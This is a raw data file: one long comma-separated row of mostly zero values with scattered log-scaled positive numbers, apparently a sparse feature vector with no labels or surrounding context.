0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.90527477843843, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 1.7412592803704001, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.969640753475787, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8888779583328805, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.9444389791664403, 0.0, 0.0, 0, 0, 0.0, 0.0, 6.864049944976711, 0, 0.0, 2.3978952727983707, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.631631038266565, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8903717578961645, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.6931471805599453, 3.7369991058576035, 0, 0.0, 2.9957322735539913, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.9930151229329605, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0, 2.8398715690385097, 0, 0.0, 4.518263445217987, 0.0, 0, 4.748123315783209, 4.292158018817389, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 7.149543163850748, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 4.66682536764049, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 7.27447955877387, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 9.722561256775933, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, 0, 0.0, 0, 0, 1.0986122886681098, 4.795790545596741, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.175867270105761, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.772588722239781, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.112432770990234, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 